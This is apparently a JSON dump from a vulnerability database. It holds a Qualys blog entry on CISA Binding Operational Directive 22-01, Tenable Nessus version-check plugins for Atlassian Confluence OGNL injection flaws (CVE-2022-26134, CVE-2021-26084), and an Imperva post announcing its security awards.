"Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", 
"CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-08-09T15:58:17", "description": "According to its self-reported version number, the Atlassian Confluence running on the remote host is affected by a command injection vulnerability. 
A remote, unauthenticated attacker can use this to execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-06-03T00:00:00", "type": "nessus", "title": "Atlassian Confluence Command Injection (CVE-2022-26134)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-23T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE-2022-26134_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/161808", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161808);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/23\");\n\n script_cve_id(\"CVE-2022-26134\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/06\");\n script_xref(name:\"IAVA\", value:\"2022-A-0227\");\n\n script_name(english:\"Atlassian Confluence Command Injection (CVE-2022-26134)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by a command injection\nvulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Atlassian Confluence running\non the remote host is affected by a command injection vulnerability. 
A remote,\nunauthenticated attacker can use this to execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on\nthe application's self-reported version number.\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c1df4fa0\");\n # https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5cd914cb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26134\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Confluence Namespace OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar app_name = 'confluence';\n\nvar port = get_http_port(default:8090);\n\nvar app_info = vcf::get_app_info(app:app_name, port:port, webapp:true);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nvar constraints = [\n { \"fixed_version\": \"7.4.17\", \"fixed_display\": \"7.4.17 / 7.18.1\"},\n {\"min_version\": \"7.5.0\", \"fixed_version\": \"7.13.7\", \"fixed_display\": \"7.13.7 / 7.18.1\"},\n {\"min_version\": \"7.14.0\", \"fixed_version\": \"7.14.3\", \"fixed_display\": \"7.14.3 / 7.18.1\"},\n {\"min_version\": \"7.15.0\", \"fixed_version\": \"7.15.2\", \"fixed_display\": \"7.15.2 / 7.18.1\"},\n {\"min_version\": \"7.16.0\", \"fixed_version\": \"7.16.4\", \"fixed_display\": \"7.16.4 / 7.18.1\"},\n {\"min_version\": \"7.17.0\", \"fixed_version\": \"7.17.4\", \"fixed_display\": \"7.17.4 / 7.18.1\"},\n {\"min_version\": \"7.18.0\", \"fixed_version\": \"7.18.1\", \"fixed_display\": \"7.18.1\"}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-09T12:31:17", "description": "The Atlassian Confluence running on the remote host is affected by a command injection vulnerability. A remote, unauthenticated attacker can use this to execute arbitrary code.\n\nNote this plugin currently only works against 7.14.x and below. 
This plugin is intended for testing LTS versions of Confluence.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "Atlassian Confluence Command Injection (CVE-2022-26134) (Direct Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-02T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE_2022_26134.NBIN", "href": "https://www.tenable.com/plugins/nessus/162175", "sourceData": "Binary data confluence_cve_2022_26134.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-16T00:14:51", "description": "Atlassian Confluence Server and Data Center versions 1.3.x < 7.4.17, 7.13.x < 7.13.7, 7.14.x < 7.14.3, 7.15.x < 7.15.2, 7.16.x < 7.16.4, 7.17.x < 7.17.4 and 7.18.x < 7.18.1 suffer from an OGNL injection vulnerability by crafting a specific URL, allowing an unauthenticated attacker to perform a remote code execution on the target application.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-06-04T00:00:00", "type": "nessus", "title": "Atlassian Confluence Namespace OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-15T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_113248", "href": "https://www.tenable.com/plugins/was/113248", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T15:36:25", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. 
It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence 7.5.x < 7.11.6 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112963", "href": "https://www.tenable.com/plugins/was/112963", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:30:17", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. 
It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.13.23 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112961", "href": "https://www.tenable.com/plugins/was/112961", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:30:18", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. 
It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence 6.14.x < 7.4.11 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112962", "href": "https://www.tenable.com/plugins/was/112962", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:30:20", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. 
It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence 7.12.x < 7.12.5 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112964", "href": "https://www.tenable.com/plugins/was/112964", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:30:20", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. 
The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled.\n\nThe affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-01T00:00:00", "type": "nessus", "title": "Atlassian Confluence Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-08T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112944", "href": "https://www.tenable.com/plugins/was/112944", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-03T04:10:17", "description": "The remote Atlassian Confluence application running on the remote host is affected by an OGNL injection vulnerability that would allow an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance by sending a specially crafted HTTP request.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-07T00:00:00", "type": "nessus", "title": "Atlassian Confluence Server Webwork OGNL Injection (CVE-2021-26084)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2022-08-02T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE_2021_26084.NBIN", "href": "https://www.tenable.com/plugins/nessus/153087", "sourceData": "Binary data confluence_cve_2021_26084.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-23T14:50:43", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 
7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-08-26T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.13.23 / 6.14 < 7.4.11 / 7.5 < 7.11.6 / 7.12 < 7.12.5 Webwork OGNL Injection (CONFSERVER-67940)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CONFSERVER-67940.NASL", "href": "https://www.tenable.com/plugins/nessus/152864", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152864);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2021-26084\");\n script_xref(name:\"IAVA\", value:\"2021-A-0397\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Atlassian Confluence < 6.13.23 / 6.14 < 7.4.11 / 7.5 < 7.11.6 / 7.12 < 7.12.5 Webwork OGNL Injection (CONFSERVER-67940)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by an OGNL injection vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Atlassian Confluence application running on the remote host is \nprior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. 
It is, therefore, affected by an OGNL injection\nvulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute\narbitrary code on a Confluence Server or Data Center instance.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7cb62fdb\");\n script_set_attribute(attribute:\"see_also\", value:\"https://jira.atlassian.com/browse/CONFSERVER-67940\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 6.13.23, 7.4.11, 7.11.6, 7.12.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26084\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Confluence WebWork OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\nvar port = get_http_port(default:80);\nvar app_info = vcf::get_app_info(app:'confluence', port:port, webapp:true);\n\nvar constraints = [\n {'fixed_version' : '6.13.23' },\n {'min_version' : '6.14', 'fixed_version' : '7.4.11' },\n {'min_version' : '7.5', 'fixed_version' : '7.11.6' },\n {'min_version' : '7.12', 'fixed_version' : '7.12.5', 'fixed_display' : '7.12.5 / 7.13.0'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2022-07-26T16:46:10", "description": "The **Cyber Defense Awards** in conjunction with [_Cyber Defense Magazine_](<https://www.cyberdefensemagazine.com/>) recently announced the winners of their prestigious annual **Global Infosec Awards for 2022**. 
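The two version-check plugins above (the CVE-2022-26134 script and the CONFSERVER-67940 / CVE-2021-26084 script) hand the actual comparison to `vcf::check_version_and_report`. The following Python is an added example, not code from the page or from Tenable: the constraint tables are transcribed from the plugins' `constraints` arrays, while the zero-padded tuple comparison and the three-segment granularity rule are my assumptions about what the `vcf` helpers do. It carries the same caveat the plugins state: it judges a self-reported version string and confirms nothing about exploitability.

```python
"""Version-range triage for the Confluence OGNL-injection advisories covered
by the Nessus plugins (CVE-2022-26134 and CVE-2021-26084).

Added example. Constraint tables come from the plugins; the comparison rules
(zero padding, >= 3 segments required) are assumptions about vcf's behaviour."""
from __future__ import annotations
import re

# Each entry: affected when min <= version < fixed (no "min" means any lower
# version). "display" is the upgrade target the plugin would report.
ADVISORIES: dict[str, list[dict[str, str]]] = {
    "CVE-2022-26134": [
        {"fixed": "7.4.17", "display": "7.4.17 / 7.18.1"},
        {"min": "7.5.0", "fixed": "7.13.7", "display": "7.13.7 / 7.18.1"},
        {"min": "7.14.0", "fixed": "7.14.3", "display": "7.14.3 / 7.18.1"},
        {"min": "7.15.0", "fixed": "7.15.2", "display": "7.15.2 / 7.18.1"},
        {"min": "7.16.0", "fixed": "7.16.4", "display": "7.16.4 / 7.18.1"},
        {"min": "7.17.0", "fixed": "7.17.4", "display": "7.17.4 / 7.18.1"},
        {"min": "7.18.0", "fixed": "7.18.1", "display": "7.18.1"},
    ],
    "CVE-2021-26084": [
        {"fixed": "6.13.23", "display": "6.13.23"},
        {"min": "6.14", "fixed": "7.4.11", "display": "7.4.11"},
        {"min": "7.5", "fixed": "7.11.6", "display": "7.11.6"},
        {"min": "7.12", "fixed": "7.12.5", "display": "7.12.5 / 7.13.0"},
    ],
}

MIN_SEGMENTS = 3  # assumed equivalent of vcf::check_granularity(sig_segments:3)


def parse_version(text: str) -> tuple[int, ...]:
    """'7.13.6' -> (7, 13, 6). Anything after the dotted numerals (e.g. '-build') is ignored."""
    m = re.match(r"\s*(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(p) for p in m.group(1).split("."))


def compare(a: tuple[int, ...], b: tuple[int, ...]) -> int:
    """Three-way compare with zero padding, so (7, 5) == (7, 5, 0)."""
    n = max(len(a), len(b))
    a, b = a + (0,) * (n - len(a)), b + (0,) * (n - len(b))
    return (a > b) - (a < b)


def assess(version: str, cve: str) -> dict[str, str]:
    """Classify one self-reported version against one advisory's ranges."""
    v = parse_version(version)
    if len(v) < MIN_SEGMENTS:
        # Too coarse to place inside a range: a bare "7.13" could be 7.13.0 or 7.13.9.
        return {"cve": cve, "status": "unknown",
                "reason": f"need {MIN_SEGMENTS} version segments, got {len(v)}"}
    for c in ADVISORIES[cve]:
        above_min = "min" not in c or compare(v, parse_version(c["min"])) >= 0
        below_fix = compare(v, parse_version(c["fixed"])) < 0
        if above_min and below_fix:
            return {"cve": cve, "status": "vulnerable", "upgrade_to": c["display"]}
    return {"cve": cve, "status": "not affected"}


def triage(version: str) -> dict[str, dict[str, str]]:
    """Run every advisory table against one version string."""
    return {cve: assess(version, cve) for cve in ADVISORIES}


if __name__ == "__main__":
    # Constructed sample versions, chosen to hit each branch.
    for sample in ("6.13.22", "7.4.11", "7.13.6", "7.13.7", "7.18.0", "7.13"):
        print(sample, triage(sample))
```

Note that 7.4.11 is fixed for CVE-2021-26084 but still inside the first CVE-2022-26134 range, which is why the triage runs every table rather than stopping at the first advisory.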
We are proud to say that Imperva earned three [**Global Infosec Awards**](<https://cyberdefenseawards.com/global-infosec-awards-for-2022-winners-by-company/>); as _Most Innovative_ for [Application Security](<https://www.imperva.com/products/application-security/>), _Cutting Edge_ for [Cloud Security](<https://www.imperva.com/solutions/securely-move-your-data-to-the-cloud/>), and as a _Market Leader_ for [Data Security](<https://www.imperva.com/products/data-security-fabric/>).\n\nToday, there are more than 4,000 (and counting) cybersecurity companies worldwide. Being singled out in such a crowded field, for three categories, brings enormous satisfaction to us at Imperva. [**Cyber Defense Awards**](<https://cyberdefenseawards.com/global-infosec-awards-for-2022-winners-by-company/>) judges determined that only 10% of cybersecurity companies worldwide deserve these prestigious awards, making the multiple recognition that much more exciting.\n\nIt gives us great pleasure to see our accomplishments recognized and celebrated as winners by [**Cyber Defense Awards**](<https://cyberdefenseawards.com/>), now in their 9th year. It is even more gratifying to know that this renowned body of judges believes our unique people, software, hardware, and solutions can help users get one step ahead of the next cybersecurity threat.\n\nIn this post, we\u2019ll provide an overview of each of the award-winning solutions and offer some insight into why they stand head and shoulders above others in the respective peer groups.\n\n## Most Innovative: Imperva Application Security\n\nIn its most effective form, an [application security solution](<https://www.imperva.com/learn/application-security/application-security/>) protects software application code and data against cyber threats. To reach award-winning effectiveness levels, organizations must apply application security during all phases of development, including design, development, and deployment. 
It is not enough simply to acquire the solution; you must apply it intelligently throughout the software development lifecycle.\n\nImperva\u2019s [Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) (WAF) stops web application attacks that prevent important transactions and steal sensitive data, with near-zero false positives. Imperva also provides powerful [DDoS attack mitigation](<https://www.imperva.com/products/ddos-protection-services/>) and [advanced bad bot protection](<https://www.imperva.com/products/advanced-bot-protection-management/>) that has proven to be scalable as these types of attacks have become [dramatically larger and more sophisticated](<https://www.imperva.com/blog/shorter-sharper-ddos-attacks-are-on-the-rise-and-attackers-are-sidestepping-traditional-mitigation-approaches/>).\n\nImperva\u2019s Application Security solution has been judged particularly innovative because it also provides continuous [protection of all APIs](<https://www.imperva.com/products/api-security/>) using deep discovery and classification of sensitive data to detect all public, private and shadow APIs, and empowers security teams to implement a positive security model. The solution also offers [runtime protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) that protects applications from [zero-day vulnerabilities](<https://www.imperva.com/blog/imperva-customers-protected-from-atlassian-confluence-cve-cve-2022-26134/>), freeing up teams to focus on business logic, without leaving applications exposed to potential exploitation. Finally, the solution [prevents supply chain fraud](<https://www.imperva.com/products/client-side-protection/>) from client-side attacks like formjacking, digital skimming, and Magecart. 
These features enable users to deploy security at multiple layers and protect applications effectively against different types of attacks.\n\n## Cutting Edge: Cloud Security\n\nImperva's SaaS-based Cloud WAF solution is part of an overall edge platform, architected into a single cloud application security and delivery stack. Users benefit from the best website protection available. The solution delivers PCI-compliant, automated security that goes beyond [OWASP Top 10](<https://www.imperva.com/learn/application-security/owasp-top-10/>) coverage, with the comprehensiveness to reduce the risks that using third party code creates, plus integrated analytics.\n\n[Imperva\u2019s Cloud WAF](<https://www.imperva.com/resources/resource-library/datasheets/imperva-cloud-waf/>) operates as a secure reverse proxy in the cloud alongside our other security services, with our globally distributed content delivery network as its backbone. After a simple DNS change to route your traffic through the Imperva network, we\u2019re able to inspect each and every request sent to the millions of applications and IPs on our network and to filter out any kind of malicious activity at any point of presence (PoP) in our network.\n\nDifferent attack vectors require different mitigation capabilities, and Imperva has built cutting-edge capabilities purpose-built for every kind of attack vector, and proprietary client classification algorithms that enable us to maintain the most updated signature and IP reputation lists in the industry. At each layer of threat detection, managed with a single set of policies, all attacks are blocked at one time without failover. 
